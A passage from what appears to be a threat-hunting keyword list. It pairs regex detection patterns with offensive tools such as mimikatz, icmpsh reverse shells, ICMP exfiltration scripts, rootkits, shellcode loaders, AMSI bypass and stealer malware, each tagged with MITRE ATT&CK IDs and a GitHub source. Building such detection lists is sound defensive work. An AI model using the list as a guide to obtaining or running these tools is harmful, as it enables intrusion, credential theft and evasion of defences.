- T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*ice-wzl/wmiexec2*",".{0,1000}ice\-wzl\/wmiexec2.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","20","1","2023-12-27T03:54:26Z","2023-02-07T22:10:08Z" "*icmpBackdoor*",".{0,1000}icmpBackdoor.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*ICMP-ReceiveFile.py*",".{0,1000}ICMP\-ReceiveFile\.py.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","294","60","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*Icmp-Redirect.py*",".{0,1000}Icmp\-Redirect\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*ICMP-SendFile.py*",".{0,1000}ICMP\-SendFile\.py.{0,1000}","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","294","60","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" "*icmpsh.exe*",".{0,1000}icmpsh\.exe.{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*icmpsh.exe*",".{0,1000}icmpsh\.exe.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*icmpsh.git*",".{0,1000}icmpsh\.git.{0,1000}","offensive_tool_keyword","icmpsh","Simple reverse ICMP shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","10","10","1520","414","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z" "*icmpsh_m.py*",".{0,1000}icmpsh_m\.py.{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*icmpsh_m.py*",".{0,1000}icmpsh_m\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*icmpsh-m.*",".{0,1000}icmpsh\-m\..{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*icmpsh-m.c*",".{0,1000}icmpsh\-m\.c.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*icmpsh-m.pl*",".{0,1000}icmpsh\-m\.pl.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*icmpsh-master*",".{0,1000}icmpsh\-master.{0,1000}","offensive_tool_keyword","icmpsh","Simple reverse ICMP shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","10","10","1520","414","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z" "*icmpsh-s.*",".{0,1000}icmpsh\-s\..{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 
shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*icmptunnel*",".{0,1000}icmptunnel.{0,1000}","offensive_tool_keyword","icmptunnel","icmptunnel works by encapsulating your IP traffic in ICMP echo packets and sending them to your own proxy server. The proxy server decapsulates the packet and forwards the IP traffic. The incoming IP packets which are destined for the client are again encapsulated in ICMP reply packets and sent back to the client. The IP traffic is sent in the 'data' field of ICMP packets.","T1041 - T1001 - T1570","TA0011","N/A","N/A","Defense Evasion","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","336","112","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*icyguider/LightsOut*",".{0,1000}icyguider\/LightsOut.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","10","4","304","43","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" "*icyguider/Shhhloader*",".{0,1000}icyguider\/Shhhloader.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*id::modify*",".{0,1000}id\:\:modify.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*IDiagnosticProfileUAC.git*",".{0,1000}IDiagnosticProfileUAC\.git.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","175","31","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*IDiagnosticProfileUAC-main*",".{0,1000}IDiagnosticProfileUAC\-main.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","175","31","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*Idov31/Jormungandr*",".{0,1000}Idov31\/Jormungandr.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*Idov31/Nidhogg*",".{0,1000}Idov31\/Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - 
T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*idrac_default_pass.txt*",".{0,1000}idrac_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*idrac_default_user.txt*",".{0,1000}idrac_default_user\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*IDSyscall.exe*",".{0,1000}IDSyscall\.exe.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall.sln*",".{0,1000}IDSyscall\.sln.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall.vcxproj*",".{0,1000}IDSyscall\.vcxproj.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall/IDSyscall*",".{0,1000}IDSyscall\/IDSyscall.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*IDSyscall\IDSyscall*",".{0,1000}IDSyscall\\IDSyscall.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*ie_execcommand_uaf.rb*",".{0,1000}ie_execcommand_uaf\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ie_win_fakenotification-clippy*",".{0,1000}ie_win_fakenotification\-clippy.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*ie_win_htapowershell.*",".{0,1000}ie_win_htapowershell\..{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*ie_win_missingflash-prettytheft*",".{0,1000}ie_win_missingflash\-prettytheft.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*iepv.exe /stext *",".{0,1000}iepv\.exe\s\/stext\s.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*IERMTCBpbnRvIHByb2Nlc3MgOiA=*",".{0,1000}IERMTCBpbnRvIHByb2Nlc3MgOiA\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*If no process provided, it will attempt to inject into explorer.exe*",".{0,1000}If\sno\sprocess\sprovided,\sit\swill\sattempt\sto\sinject\sinto\sexplorer\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*if os.getlogin() in [""WDAGUtilityAccount"",""Abby"",""Peter Wilson"",""hmarc"",""patex"",""JOHN-PC"",""RDhJ0CNFevzX"",""kEecfMwgj"",""Frank"",""8Nl0ColNQ5bq""*",".{0,1000}if\sos\.getlogin\(\)\sin\s\[\""WDAGUtilityAccount\"",\""Abby\"",\""Peter\sWilson\"",\""hmarc\"",\""patex\"",\""JOHN\-PC\"",\""RDhJ0CNFevzX\"",\""kEecfMwgj\"",\""Frank\"",\""8Nl0ColNQ5bq\"".{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much 
More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*If the attack is successful* you will see authentication logs of machines retrieving and executing the malicious GPO*",".{0,1000}If\sthe\sattack\sis\ssuccessful.{0,1000}\syou\swill\ssee\sauthentication\slogs\sof\smachines\sretrieving\sand\sexecuting\sthe\smalicious\sGPO.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*If XWorm Does Not work - Run This Script As Administrator!*",".{0,1000}If\sXWorm\sDoes\sNot\swork\s\-\sRun\sThis\sScript\sAs\sAdministrator!.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*if you do not use masscan you can't give me CIDR as input*",".{0,1000}if\syou\sdo\snot\suse\smasscan\syou\scan\'t\sgive\sme\sCIDR\sas\sinput.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - 
TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*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*",".{0,1000}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\=.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*Ignitetechnologies/Persistence-Accessibility-Features*",".{0,1000}Ignitetechnologies\/Persistence\-Accessibility\-Features.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","1","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*IIS-Backdoor.*",".{0,1000}IIS\-Backdoor\..{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*IIS-Raid-master*",".{0,1000}IIS\-Raid\-master.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*iisreset.exe /stop*",".{0,1000}iisreset\.exe\s\/stop.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat 
ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ikeforce.py*",".{0,1000}ikeforce\.py.{0,1000}","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs/ikeforce","1","1","N/A","N/A","3","231","74","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z" "*ikescan2john.py*",".{0,1000}ikescan2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ILBypass.ps1*",".{0,1000}ILBypass\.ps1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*imaohw/nib/rsu/*",".{0,1000}imaohw\/nib\/rsu\/.{0,1000}","offensive_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. 
or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Collection","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*imapattack.py*",".{0,1000}imapattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*imapattack.py*",".{0,1000}imapattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*imaprelayclient.py*",".{0,1000}imaprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 